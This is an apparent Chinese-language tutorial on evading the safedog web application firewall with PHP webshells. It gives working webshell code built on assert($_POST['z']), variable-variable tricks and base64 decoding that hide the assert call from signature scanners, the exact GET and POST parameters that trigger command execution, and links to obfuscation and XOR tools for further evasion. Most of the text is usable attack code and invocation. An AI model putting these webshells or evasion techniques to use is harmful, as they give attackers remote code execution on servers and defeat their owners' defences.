[TOC] # WAF代码绕过（绕过流量检测） ## safedog代码层手写及脚本绕过 ## 变量覆盖 **1.1、原理：** 把敏感字符传递的参数中，waf能够确定你的代码，但是确定不了你传递的参数值 safedog有变量追踪，简单拆分的话，扫描会直接报马的 **1.2、原型：** ``` <?php assert($_POST['z'])?> ``` **1.3、变量覆盖:** ``` <?php $a = $_GET['x']; $$a = $_GET['y']; $b($_POST['z']); //?x=b&y=assert //$a = b //$$a ->$b 变量引用 //$b= assert //$b($_POST['z']);--->assert($_POST['z']) ?> ``` **1.4、URL传参** ``` URL/1.php?x=b&y=assert ----------------- (post提交) z=phpinfo(); ``` ## 加密混淆 **2.1、原理：** 基于关键字的匹配过滤规则 上传一个附带对应的解密方法，然后上传经过对应加密的执行语句 **2.2、shell文件** shell.php ``` <?php $a = $_GET['x']; $$a = $_GET['y']; $b(base64_decode($_POST['z'])); ?> ``` **2.3、加密** 对要执行的语句加密 **2.4、URL传参** ``` URL/1.php?x=b&y=assert (post提交) z=cGhwaW5mbygpOw== ``` **2.5、加密混淆工具** 【WAF绕过-加密混淆】php代码加密混淆 https://blog.csdn.net/qq_53079406/article/details/124874012?spm=1001.2014.3001.5501 https://www.phpjiami.com/phpjiami.html ## 异或生成 **3.1、原理：** 定义：两个值相同时，返回false，否则返回true XOR有一个特点：如果对一个值连续做两次 XOR，会返回这个值本身。 * * * 最适合用于简易加解密运算 原理是：数A和数B进行异或运算生成数C，如果将C和B进行异或运算则C又会还原为A **3.2、网址：** 异或运算加密/解密 - 一个工具箱 - 好用的在线工具都在这里！ (atoolbox.net) http://www.atoolbox.net/Tool.php?Id=857